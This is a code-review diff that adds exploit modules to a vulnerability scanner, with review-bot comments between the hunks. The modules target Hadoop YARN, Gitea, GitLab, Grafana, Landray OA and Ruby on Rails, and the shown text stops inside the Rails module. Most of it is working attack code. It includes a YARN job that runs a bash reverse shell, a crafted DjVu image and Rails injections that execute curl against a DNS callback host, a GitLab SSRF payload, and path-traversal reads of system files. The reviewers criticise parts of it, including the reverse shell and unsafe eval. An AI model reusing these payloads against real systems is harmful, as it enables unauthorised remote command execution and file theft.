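Review bot: `res.request.body.decode()` in the new bytes branch assumes the body is valid UTF-8; a request whose body is raw binary (a file-upload or gadget payload built from bytes) raises `UnicodeDecodeError`, which the surrounding bare `except:` then swallows by returning the half-built `info_res`, so exactly the requests most worth logging come out truncated with no hint why. Use `res.request.body.decode('utf-8', errors='replace')` and `isinstance(res.request.body, bytes)` instead of `type(...) == bytes`. Separately, the context line `for key, value in res.request.headers.items():` rebinds the `key` parameter that the previous hunk added to `output_res`; it is only read before the loop so nothing breaks today, but `for name, value in ...` removes the shadowing. `output_res` begins in the preceding hunk, and the non-colour branch in the next hunk has the same decode issue.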
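Review bot: `res.request.body.decode()` in the new bytes branch of `logging_4` raises `UnicodeDecodeError` for any request body that is not valid UTF-8, and the identical bytes-vs-str check is now copied in three places (here and twice in output.py). A single helper in `lib/tool`, `def body_text(body): return body.decode('utf-8', errors='replace') if isinstance(body, bytes) else body`, would make the log robust to binary payloads and keep the three copies from drifting. `logging_4` begins outside this hunk.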
@@ -0,0 +1,155 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + + Apache Hadoop扫描类: + Hadoop YARN ResourceManager 未授权访问 + 暂无编号 + Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class ApacheHadoop(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'ApacheHadoop' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.apache_hadoop_unauthorized_payloads = [ + { + 'path': 'ws/v1/cluster/apps/new-application', + 'data': '' + }, + # { + # 'path': 'ws/v1/cluster/apps', + # 'data': { + # 'application-id': '', + # 'application-name': 'mouse', + # 'am-container-spec': { + # 'commands': { + # 'command': 'curl DNSdomain', # * ping或curl无效, 放弃 + # }, + # }, + # 'application-type': 'YARN', + # } + # }, + { + 'path': 'ws/v1/cluster/apps', + 'data': { + 'application-id': '', + 'application-name': 'mouse', + 'am-container-spec': { + 'commands': { + 'command': '/bin/bash >& /dev/tcp/ip/port 0>&1', + }, + }, + 'application-type': 'YARN', + } + }, + ] + + def apache_hadoop_unauthorized_scan(self, url): + ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, + 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 + ''' + # sessid = '3861eb6b3d023d464efe85aa01277d27' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'unAuthorized' + vul_info['vul_id'] = 'ApacheHadoop-unAuth' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = { + 'Content-Type': 'application/json' + } + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in 
range(len(self.apache_hadoop_unauthorized_payloads)): + # md = random_md5() # * 随机md5值, 8位 + # dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = self.apache_hadoop_unauthorized_payloads[payload]['path'] + data = self.apache_hadoop_unauthorized_payloads[payload]['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + if (payload == 0): # * 获取application-id + res1 = requests.post( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + try: + if (res1.json()['application-id']): + self.application_id = res1.json()['application-id'] + continue + except: + return None + + # command = data['am-container-spec']['commands']['command'] + # data['am-container-spec']['commands']['command'] = command.replace('DNSdomain', dns_domain) + data['application-id'] = self.application_id + + res2 = requests.post( + target, + timeout=self.timeout, + headers=headers, + json=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (res2.status_code == 202): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res2 + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.apache_hadoop_unauthorized_scan, url=url) + ] + +hadoop = ApacheHadoop() diff --git a/payloads/Gitea.py b/payloads/Gitea.py new file mode 100644 index 0000000..486b99a --- /dev/null +++ b/payloads/Gitea.py 
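Review bot: The second payload submits a real YARN application whose AM command is `'/bin/bash >& /dev/tcp/ip/port 0>&1'` — a reverse shell aimed at the literal placeholders `ip`/`port`; it can never connect, but the target cluster still schedules and runs the container, and the scan only checks for a 202 on `ws/v1/cluster/apps`, so the command body contributes nothing to detection. Use the harmless marker that `__init__` already defines and never uses, `'command': self.cmd,`, and state the intent in the docstring (`# submits a job that only echoes a marker; the 202 Accepted is the signal, not the command`). Second, `self.application_id` and the in-place `data['application-id'] = ...` live on the module-level singleton `hadoop`, while `addscan` launches each target in a `thread(...)`, so two concurrent targets can submit each other's application id; keep the id in a local and build the submission dict inside the method rather than mutating the shared payload. Third, `addscan` runs `eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))`, so a URL containing `"` (for example from `-f url.txt`) executes arbitrary Python inside the scanner; `thread(target=getattr(self, vuln + '_scan'), url=url)` does the same job without `eval`.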
@@ -0,0 +1,160 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Gitea是从gogs衍生出的一个开源项目, 是一个类似于Github、Gitlab的多用户Git仓库管理平台 + Gitea扫描类: + Gitea 1.4.0 未授权访问, 综合漏洞(目录穿越, RCE等) + 暂无编号 + Payload: https://vulhub.org/#/environments/gitea/1.4-rce/ + + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class Gitea(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Gitea' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.gitea_unauthorized_payloads = [ + { + 'path': '.git/info/lfs/objects', + 'data': '''{ + "Oid": "....../../../etc/passwd", + "Size": 1000000, + "User" : "a", + "Password" : "a", + "Repo" : "a", + "Authorization" : "a" +}''', + 'headers': head.merge(self.headers, { + 'Content-Type': 'application/json', + 'Accept': 'application/vnd.git-lfs+json' + }) + }, + { + 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd/a', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '.git/info/lfs/objects', + 'data': '''{ + "Oid": "....../../../C:/Windows/System32/drivers/etc/hosts", + "Size": 1000000, + "User" : "a", + "Password" : "a", + "Repo" : "a", + "Authorization" : "a" +}''', + 'headers': head.merge(self.headers, { + 'Content-Type': 'application/json', + 'Accept': 'application/vnd.git-lfs+json' + }) + }, + { + 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2FC:%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts/a', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + ] + + def gitea_unauthorized_scan(self, url): + ''' 其1.4.0版本中有一处逻辑错误, 
导致未授权用户可以穿越目录, 读写任意文件, 最终导致执行任意命令 ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'unAuthorized' + vul_info['vul_id'] = 'Gitea-unAuthorized' + vul_info['vul_method'] = 'POST/GET' + + for payload in range(len(self.gitea_unauthorized_payloads)): + path = self.gitea_unauthorized_payloads[payload]['path'] + data = self.gitea_unauthorized_payloads[payload]['data'] + headers = self.gitea_unauthorized_payloads[payload]['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if (payload in [0, 2]): + res1 = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + if (res1.status_code in [202, 401]): + path = self.gitea_unauthorized_payloads[payload+1]['path'] + headers = self.gitea_unauthorized_payloads[payload+1]['headers'] + target = url + path + + res2 = requests.get( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + + if (('/sbin/nologin' in res2.text) + or ('root:x:0:0:root' in res2.text) + or ('Microsoft Corp' in res2.text) + or ('Microsoft TCP/IP for Windows' in res2.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request-1': res1, + 'Request-2': res2 + } + return results + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + 
thread(target=self.gitea_unauthorized_scan, url=url) + ] + +gitea = Gitea() diff --git a/payloads/Gitlab.py b/payloads/Gitlab.py new file mode 100644 index 0000000..35d5fb0 --- /dev/null +++ b/payloads/Gitlab.py 
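Review bot: In `gitea_unauthorized_scan` the follow-up GET is issued on both `202` and `401` from the LFS POST (`if (res1.status_code in [202, 401])`), but nothing records why a rejected, unauthenticated upload should still be treated as a go-ahead; if 401 is meant to cover instances that refuse the metadata write while the object path still serves the traversal, say so in a comment, otherwise narrow the check to `[202]`. The loop also walks all four payload indices but only acts on 0 and 2, reaching the partner entry via `payload+1`; iterating `for post, get in zip(payloads[::2], payloads[1::2]):` makes the POST/GET pairing explicit and removes the two no-op iterations. The module docstring's `file:///C:\Windows\System32\drivers\etc\hosts` also carries `\W`, `\S`, `\d` sequences that CPython flags as invalid escapes — prefix the docstring with `r` or double the backslashes.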
@@ -0,0 +1,235 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + + Gitlab扫描类: + 1. GitLab Pre-Auth 远程命令执行 + CVE-2021-22205 + Payload: https://vulhub.org/#/environments/gitlab/CVE-2021-22205/ + 反弹shell: https://blog.csdn.net/weixin_46137328/article/details/121551162 + + 2. Gitlab CI Lint API未授权 SSRF + CVE-2021-22214 + Payload: https://cloud.tencent.com/developer/article/1851527 + + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep +import re + +class Gitlab(): + def __init__(self): + self.session = requests.session() + + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Gitlab' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2021_22205_payloads = [ + { + 'path': 'users/sign_in', + 'data': '' + }, + { + 'path': 'uploads/user', + 'data': '' + }, + { + 'path': 'sign_in', + 'data': '' + }, + { + 'path': 'user', + 'data': '' + } + ] + + self.cve_2021_22214_payloads = [ + { + 'path': 'api/v4/ci/lint', + 'data': '{ "include_merged_yaml": true, "content": "include:\\n remote: http://DNSdomain/api/v1/targets/?test.yml"}' + }, + ] + + def cve_2021_22205_scan(self, url): + ''' 在 GitLab CE/EE中发现了一个从11.9版本开始的问题, + GitLab未正确验证传递给文件解析器的图像文件, 从而导致未经身份验证的远程命令执行 + ''' + sessid = '597d45eba94e6e1651ae4fe7bf3b062e' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2021-22205' + vul_info['vul_method'] = 'GET/POST' + vul_info['headers'] = {} + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in 
range(len(self.cve_2021_22205_payloads)): + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + dns_command = 'curl ' + dns_domain + + path = self.cve_2021_22205_payloads[payload]['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + if (payload in [0, 2]): + res1 = self.session.get( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + csrf_token_re = re.search(r'name="csrf-token" content=".*"', res1.text, re.I|re.M|re.U) + + if csrf_token_re: + csrf_token = csrf_token_re.group(0) + csrf_token = csrf_token.rstrip('"').replace('name="csrf-token" content="', '') + headers.update({'X-CSRF-Token': csrf_token}) + del headers['Content-Type'] + + path = self.cve_2021_22205_payloads[payload+1]['path'] + target = url + path + + data = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' + \ + (len(dns_command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) + \ + b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' + \ + (len(dns_command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) + \ + b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' + \ + dns_command.encode() + \ + b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a' + + files = [('file', ('test.jpg', data, 'image/jpeg'))] + + res2 = self.session.post( + target, + timeout=self.timeout, + headers=headers, + files=files, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Exp': 
'https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/poc.py', + 'Request-1(csrf-token)': res1, + 'Request-2': res2 + } + return results + else: + continue + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def cve_2021_22214_scan(self, url): + ''' Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式, + 其include操作支持remote选项, 用于获取远端的yaml, 因此在此处将remote参数设置为本地回环地址, + 同时由于后端会检查最后扩展名, 加上?test.yaml 即可绕过 + ''' + sessid = '35c4b2b338754840369c3b20a2847f0a' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'SSRF' + vul_info['vul_id'] = 'CVE-2021-22214' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = { + 'Content-Type': 'application/json' + } + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in self.cve_2021_22214_payloads: + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' 
+ dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'] + data = payload['data'].replace('DNSdomain', dns_domain) + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2021_22205_scan, url=url), + thread(target=self.cve_2021_22214_scan, url=url) + ] + +gitlab = Gitlab() diff --git a/payloads/Grafana.py b/payloads/Grafana.py new file mode 100644 index 0000000..face33b --- /dev/null +++ b/payloads/Grafana.py 
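Review bot: In `cve_2021_22205_scan` the CSRF token is pulled out with the greedy pattern `name="csrf-token" content=".*"` and then trimmed with `rstrip('"')`; if any other quoted attribute follows on the same line, the match runs to the last `"` and the value sent as `X-CSRF-Token` is garbage. Use a capture group instead: `csrf_token_re = re.search(r'name="csrf-token" content="([^"]*)"', res1.text, re.I)` and `csrf_token = csrf_token_re.group(1)`. Right after it, `del headers['Content-Type']` raises `KeyError` whenever the configured headers carry no Content-Type, and the bare `except:` below reports that as a generic 'Error'; `headers.pop('Content-Type', None)` is the safe form. Note too that `self.session` is created once on the module-level `gitlab` singleton, so cookies (and the CSRF token bound to them) from one target leak into the next when several URLs are scanned through `thread(...)`; a `requests.session()` created per call would isolate them.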
@@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' # ! 由于该POC数据包过多, 只有在指纹识别为Grafana时才会进行扫描, 否则vulcat不会使用该POC + + Grafana扫描类: + Grafana 8.x 插件模块文件路径遍历 + CVE-2021-43798 + Payload: https://vulhub.org/#/environments/grafana/CVE-2021-43798/ + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Grafana(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Grafana' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2021_43798_payloads = [ + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': '' + }, + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts', + 'data': '' + }, + # { + # 'path': 'plugins/{}/../../../../../../../../../../../../../etc/passwd', + # 'data': '' + # }, + # { + # 'path': '{}/../../../../../../../../../../../../../etc/passwd', + # 'data': '' + # }, + ] + # * 该漏洞是由插件模块引起的, 以下是一些常见的插件id + self.cve_2021_43798_plugins = [ + 'alertlist', + 'cloudwatch', + 'dashlist', + 'elasticsearch', + 'graph', + 'graphite', + 'heatmap', + 'influxdb', + 'mysql', + 'opentsdb', + 'pluginlist', + 'postgres', + 'prometheus', + 'stackdriver', + 'table', + 'text' + ] + + def cve_2021_43798_scan(self, url): + ''' 2021年12月, 一位Twitter用户披露了一个0day漏洞, + 
未经身份验证的攻击者可以利用该漏洞通过 Grafana 8.x 的插件url来遍历web路径并下载任意文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2021-43798' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2021_43798_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + for plugins in self.cve_2021_43798_plugins: + sleep(0.5) # * 防止扫描过快 + + res = requests.get( + target.format(plugins), + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': res.request.path_url, + }, + 'Request': res + } + return results + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2021_43798_scan, url=url) + ] + +grafana = Grafana() diff --git a/payloads/Landray.py b/payloads/Landray.py new file mode 100644 index 0000000..71395d1 --- /dev/null +++ b/payloads/Landray.py 
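Review bot: The third `cve_2021_43798_payloads` entry embeds `C:\Windows\System32\drivers\etc\hosts` in a plain string, so `\W`, `\S`, `\d`, `\e` and `\h` are invalid escape sequences — CPython keeps the backslashes but warns (a `SyntaxWarning` from 3.12), and the raw backslashes then go into a URL path that requests will most likely percent-encode before Grafana sees them; make it a raw string (`r'public/plugins/{}/...C:\Windows\System32\drivers\etc\hosts'`) or drop the entry, since the forward-slash variant directly above already covers Windows. The plugin loop also sleeps 0.5 s before every request, so a non-vulnerable host costs 3 × 16 requests plus about 24 s of sleeping per target; consider trying every plugin with the `/etc/passwd` path first and only falling back to the Windows paths afterwards, or making the delay configurable alongside `timeout`. The bare `except:` at the end of the loop swallows `KeyboardInterrupt` as well; `except Exception:` is the right boundary there.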
@@ -0,0 +1,134 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +蓝凌是国内数字化办公专业服务商 + 蓝凌OA扫描类: + 蓝凌OA custom.jsp任意文件读取(SSRF) + CNVD-2021-28277 + + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Landray(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Landray-OA' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cnvd_2021_28277_payloads = [ + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file:///etc/passwd"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file:///etc/passwd"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + }, + ] + + def cnvd_2021_28277_scan(self, url): + ''' ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'SSRF' + vul_info['vul_id'] = 'CNVD-2021-28277' + vul_info['vul_method'] = 'POST' + 
vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cnvd_2021_28277_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=self.headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text)) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res, + # 'Default SceretKey': 'kmssAdminKey' + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cnvd_2021_28277_scan, url=url) + ] + +landray = Landray() diff --git a/payloads/RubyOnRails.py b/payloads/RubyOnRails.py new file mode 100644 index 0000000..d85a93c --- /dev/null +++ b/payloads/RubyOnRails.py 
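Review bot: `cnvd_2021_28277_scan` has an empty docstring (`''' '''`) while the other scan methods in this change describe what they probe; a one-liner such as `'''custom.jsp parses the JSON in the var parameter and fetches body.file, so file:// and /WEB-INF paths are read back without authentication'''` is what a reader needs here, and since the detection matches passwd/hosts/admin.properties content the `'SSRF'` vul_type deserves a note that it is exercised as a local file read. The two `file://C:\Windows\System32\drivers\etc\hosts` payloads put `\W`, `\S`, `\d`, `\e`, `\h` into a plain Python string and then into a JSON value, where they are invalid escapes on both sides; the forward-slash variant sent immediately before already covers Windows, so drop those entries or write them as raw strings. The commented-out `# 'Default SceretKey': 'kmssAdminKey'` should either become a documented result key (spelled `SecretKey`) or be removed — as written it is dead code with a typo.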
@@ -0,0 +1,320 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Ruby On Rails 是著名的Ruby Web开发框架 + Ruby on Rails扫描类: + 1. Ruby on Rails 路径遍历 + CVE-2018-3760 + Payload: https://vulhub.org/#/environments/rails/CVE-2018-3760/ + + 2. Ruby on Rails 路径穿越与任意文件读取 + CVE-2019-5418 + Payload: https://vulhub.org/#/environments/rails/CVE-2019-5418/ + + 3. Ruby on Rails 命令执行 + CVE-2020-8163 + Payload: https://github.com/h4ms1k/CVE-2020-8163/ + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from json import load +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep +import re + +class RubyOnRails(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Ruby on Rails' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2018_3760_payloads = [ + { + 'path': 'assets/file:%2f%2f/etc/passwd', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'file:%2f%2f/etc/passwd', + 'data': '' + }, + { + 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd', + 'data': '' + }, + { + 'path': 
'file:%2f%2f/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + } + ] + + self.cve_2019_5418_payloads = [ + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../etc/passwd{{' + }) + }, + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../C:/Windows/System32/drivers/etc/hosts{{' + }) + }, + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../C:\Windows\System32\drivers\etc\hosts{{' + }) + } + ] + + self.cve_2020_8163_payloads = [ + { + 'path': '?[system("curl DNSdomain")end%00]', + 'data': '' + }, + { + 'path': '?[system("ping -c 4 DNSdomain")end%00]', + 'data': '' + }, + { + 'path': '?[system("ping DNSdomain")end%00]', + 'data': '' + } + ] + + def cve_2018_3760_scan(self, url): + ''' 在开发环境中使用 Sprockets 作为静态文件服务器 + Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞, 